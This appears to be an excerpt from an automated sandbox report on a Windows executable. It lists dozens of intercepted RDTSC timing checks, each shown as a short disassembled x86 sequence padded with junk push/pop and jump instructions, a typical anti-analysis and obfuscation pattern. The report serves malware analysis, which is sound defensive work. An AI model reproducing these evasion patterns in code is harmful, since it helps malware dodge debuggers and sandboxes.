              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA3F6A second address: FA3F73 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA4119 second address: FA411E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA4429 second address: FA442D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA442D second address: FA4431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA4431 second address: FA4446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F8E84B4EF76h 0x0000000d jbe 00007F8E84B4EF76h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA488B second address: FA48B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8E8511F5E7h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F8E8511F5D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA49F1 second address: FA49FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8E84B4EF76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA49FB second address: FA4A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA4A00 second address: FA4A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8E84B4EF76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA4A0C second address: FA4A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E8511F5E0h 0x00000009 popad 0x0000000a jmp 00007F8E8511F5E5h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA4A3D second address: FA4A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA4A43 second address: FA4A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA4BD1 second address: FA4BF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F8E84B4EF7Eh 0x0000000e popad 0x0000000f js 00007F8E84B4EF8Ah 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA858D second address: FA8593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FAFA91 second address: FAFABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8E84B4EF76h 0x0000000a popad 0x0000000b jnl 00007F8E84B4EF85h 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FAFABD second address: FAFAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F748FA second address: F74901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F74901 second address: F7490F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F7490F second address: F74913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F74913 second address: F74919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F74919 second address: F74949 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8E84B4EF76h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edi 0x00000013 jmp 00007F8E84B4EF86h 0x00000018 pop edi 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F74949 second address: F74970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F8E8511F5E4h 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F74A37 second address: F74A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F74A3D second address: F74A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F74A42 second address: F74A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F74A96 second address: F74AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F8E8511F5E1h 0x0000000b xchg eax, esi 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F8E8511F5D8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 nop 0x00000027 jmp 00007F8E8511F5DEh 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F8E8511F5E9h 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F751B0 second address: F751BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8E84B4EF76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F755A1 second address: F755C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007F8E8511F5D6h 0x00000010 jmp 00007F8E8511F5E2h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F755C4 second address: F75624 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push esi 0x0000000b mov dx, si 0x0000000e pop ecx 0x0000000f lea eax, dword ptr [ebp+12482053h] 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F8E84B4EF78h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f add dword ptr [ebp+122D17BFh], ebx 0x00000035 push eax 0x00000036 jng 00007F8E84B4EF8Dh 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F8E84B4EF7Fh 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F75624 second address: F75683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F8E8511F5E4h 0x0000000e jmp 00007F8E8511F5DCh 0x00000013 pop ecx 0x00000014 lea eax, dword ptr [ebp+1248200Fh] 0x0000001a call 00007F8E8511F5DCh 0x0000001f jmp 00007F8E8511F5E7h 0x00000024 pop ecx 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jc 00007F8E8511F5D6h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F75683 second address: F75687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F75687 second address: F7568D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F7568D second address: F75692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FAED78 second address: FAED7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FAED7E second address: FAED82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1009677 second address: 1009683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8E8511F5D6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1019508 second address: 101952B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8E84B4EF76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8E84B4EF80h 0x00000010 jg 00007F8E84B4EF76h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 10182FD second address: 1018301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1018610 second address: 101861A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8E84B4EF76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1018762 second address: 101879D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jnc 00007F8E8511F5D6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 jmp 00007F8E8511F5DAh 0x0000001a jo 00007F8E8511F5DEh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 101D9A2 second address: 101D9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8E84B4EF76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 101D5E0 second address: 101D5FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E8h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 10272B6 second address: 10272BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 102BB67 second address: 102BB6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 102D0FD second address: 102D101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 102D101 second address: 102D116 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8E8511F5D6h 0x00000008 jng 00007F8E8511F5D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 103B8FB second address: 103B901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 103B73A second address: 103B740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 103B740 second address: 103B744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 103B744 second address: 103B779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E1h 0x00000007 jmp 00007F8E8511F5E9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 103B779 second address: 103B77F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 103B77F second address: 103B788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 103B788 second address: 103B793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 103F627 second address: 103F62B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 103F62B second address: 103F648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8E84B4EF76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8E84B4EF7Eh 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 103F383 second address: 103F38B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1053F63 second address: 1053F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F8E84B4EF7Eh 0x0000000d js 00007F8E84B4EF76h 0x00000013 pushad 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1053267 second address: 105327F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8E8511F5E2h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 10536C6 second address: 10536CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 10536CA second address: 10536D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 10536D0 second address: 10536F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8E84B4EF90h 0x0000000c jmp 00007F8E84B4EF84h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1053872 second address: 1053876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1053876 second address: 105387A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1053A12 second address: 1053A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1053B55 second address: 1053B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1053CAD second address: 1053CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5E4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1056BC1 second address: 1056BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1056F7A second address: 1056F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8E8511F5D6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1056F85 second address: 1056F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1056F8B second address: 1056FE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007F8E8511F5E4h 0x00000013 call 00007F8E8511F5E8h 0x00000018 mov dx, 70ECh 0x0000001c pop edx 0x0000001d pop edx 0x0000001e push dword ptr [ebp+122D2FA1h] 0x00000024 mov edx, esi 0x00000026 push ECD781B4h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push eax 0x0000002f pop eax 0x00000030 pop eax 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1059B37 second address: 1059B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1059B3D second address: 1059B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1059B41 second address: 1059B53 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F8E84B4EF76h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 1059B53 second address: 1059B5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 105BB6F second address: 105BB9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E84B4EF86h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F8E84B4EF7Dh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F6F84F second address: F6F855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370925 second address: 5370929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370929 second address: 537092D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 537092D second address: 5370933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370933 second address: 537096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx ecx, bx 0x0000000f mov ax, bx 0x00000012 popad 0x00000013 push ebp 0x00000014 pushad 0x00000015 call 00007F8E8511F5E0h 0x0000001a mov bh, cl 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f mov ah, 19h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 537096E second address: 5370972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370972 second address: 537098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ecx 0x0000000a jmp 00007F8E8511F5DBh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 537098E second address: 5370992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370992 second address: 5370996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370996 second address: 537099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 537099C second address: 53709B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5E9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 53709B9 second address: 5370A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8E84B4EF81h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movsx edx, si 0x00000018 pushfd 0x00000019 jmp 00007F8E84B4EF84h 0x0000001e or cx, 5138h 0x00000023 jmp 00007F8E84B4EF7Bh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370A10 second address: 5370A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5E4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370A28 second address: 5370A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b pushad 0x0000000c movsx ebx, ax 0x0000000f pushfd 0x00000010 jmp 00007F8E84B4EF86h 0x00000015 sbb esi, 667CF5F8h 0x0000001b jmp 00007F8E84B4EF7Bh 0x00000020 popfd 0x00000021 popad 0x00000022 nop 0x00000023 pushad 0x00000024 mov bx, ax 0x00000027 mov esi, 719F9527h 0x0000002c popad 0x0000002d push eax 0x0000002e jmp 00007F8E84B4EF7Dh 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: 5370A81 second address: 5370A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
